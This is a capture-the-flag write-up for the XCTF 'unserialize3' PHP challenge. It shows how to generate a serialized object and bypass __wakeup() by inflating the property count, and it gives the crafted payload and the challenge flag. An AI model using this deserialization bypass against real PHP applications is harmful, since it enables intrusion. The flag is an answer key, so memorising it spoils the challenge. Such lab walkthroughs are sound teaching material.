Advanced area of attack and defense world web masters unserialize3

1. Code

2.. Open website observation , notice wakeup(） Think of deserialization , To serialize, you must bypass wakeup(）, Attach a previously made link , The problem of analyzing code only needs to be serialized , Bring in the parameters to solve .

First step , structure payload Get the serialized value , Code ：

<?php
class xctf{
public $flag = '111';
public function __wakeup(){
exit('bad requests');
}
}
$d=new  xctf();
echo serialize($d);// Display the value after serialization 
?>

How to get the serialized value ？ Start by opening phpstudy, Then create a new one under the directory of your website php The file of , Fill in code , Visit the website to get

Get the serialized value ：O:4:"xctf":1:{s:4:"flag";s:3:"111";}#echo serialize($d

The second step , After getting the serialized value , You can try it directly .

Find back bad requests, You will find that it is implemented wakeup(）, Add wakeup() Related knowledge ： Since the serialized value will be deserialized automatically, it is necessary to bypass __wakeup(),wakeup() Function has a vulnerability , When the number of member variables is greater than the number of actual member variables of this class , Will skip wakeup() Implementation . What do you mean ？

The original     ：O:4:"xctf":1:{s:4:"flag";s:3:"111";}#echo serialize($d

After circling ：O:4:"xctf":2:{s:4:"flag";s:3:"111";}#echo serialize($d

take 1 Change to ratio 1 Big , for example 2, That's what it means

Last , Into the , Succeed in getting flag：the answer is : cyberpeace{c7838ad5f8807926cbeb9a3dea0a811f}

Related links :

CSDNhttps://mp.csdn.net/mp_blog/creation/editor/124302587